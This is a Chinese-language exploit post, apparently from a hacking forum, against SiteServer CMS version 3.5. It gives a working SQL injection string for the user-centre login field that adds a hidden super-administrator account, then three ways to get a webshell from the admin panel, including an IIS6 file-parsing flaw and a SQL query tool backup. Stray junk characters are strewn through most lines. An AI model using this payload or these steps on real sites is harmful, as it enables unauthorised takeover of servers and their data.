经测试秒杀最新的3.5版
' e. k; H+ b5 c4 e" L J) o! {: P8 ^* @0 w
stieserver官网:www.siteserver.cn2 ]- ?, p1 f. W0 k& l% k) D
# L* N7 S1 O: t E" @5 Q' X
3 `- z" O" Y" B2 x1 T S
0 a: |8 X6 O0 M; N2 P' [
EXP:2 j7 F+ e1 }5 B: I. d
1 `% G a* D4 C# w0 Y8 f
直接访问UserCenter/login.aspx# m7 J) o v* o0 O) r1 q& g9 L4 [5 N
2 z4 U6 s, ]) Y5 I6 o( q4 L
P7 U( u" L8 P2 n r) I
, `4 C) g7 T V. Q8 A用户名处输入:; Z& M5 k& X- \ c$ P" f x
9 K3 j; R+ v7 l6 q
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--* Q- q: l; R( `3 @
" G Q7 z) x% S+ |
7 e9 g0 L8 I# n# e9 ?# a0 p7 T3 s3 L
& k9 t' P$ r$ ~; F0 d) E密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
; U: y: ~) ~9 g( i C/ h
- G4 S2 f! S4 z8 V: x ; x G. c2 ^( B9 ?
6 p, A. Q! L. P* w! B之后再访问后台SiteServer/login.aspx用插入的用户登陆
2 l" p9 N" t/ T( d9 m$ k6 J
9 l! d7 Y3 _% e; ^- {) N
0 Z4 T! d5 S* z3 u/ H
9 w: Q" H. q+ U n% {' u! D+ Q后台拿webshell的三种方法:
" o" e N" C$ j: L
4 d0 ~& n D: S2 Z" O* A5 n一、4 k# \+ l( X5 ]# N7 G
" k, z# X) o5 o% Z7 t5 g, b* l
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
' ^8 @# @4 G, d1 u+ J7 R& k
# {8 O. c: o0 G6 E/ E5 m' Q二、& H" T$ g0 r E3 E7 `9 K
/ B, }4 u6 k9 S% \5 ~/ A1 f: V' D' M
成员权限-》添加用户-》用户名为:1.asp
! x7 f" H6 { E' [9 U
2 D2 K2 y2 t& l$ n$ w6 _1 jhttp://127.0.0.1/usercenter/4 C" ]0 h; a* a, P" j# n* J
/ G: M6 S0 c" F# b, J% R, s用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
, M: g( P3 U" \: ]" D: j# y8 p5 [0 `( z" V$ V* i7 A' T
(ps:后台添加用户时不会验证是否含有非法字符)9 F3 K+ a, N+ m! L6 ]" s9 v1 u' }
0 O- z2 U- y5 r& }: A) L# F/ w% P
三、+ A$ Q" [; ^) `0 i8 m
1 X" ~6 b* Y' Y" Y
系统工具-》实用工具-》机器参数查看0 D, u3 N8 r" d
可以看到数据库类型、名称,WEB路径4 ~- G" @! {: W2 {% X C# W
( a' }. b$ V) Z b9 u4 A7 s6 v: v4 g系统工具-》数据库工具-》SQL语句查询
5 Q! O3 i' U) s. P这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
# m1 F- B' w( [1 h7 F1 x4 B* ?
9 D8 p( o$ e* [* j' D5 X7 K# i |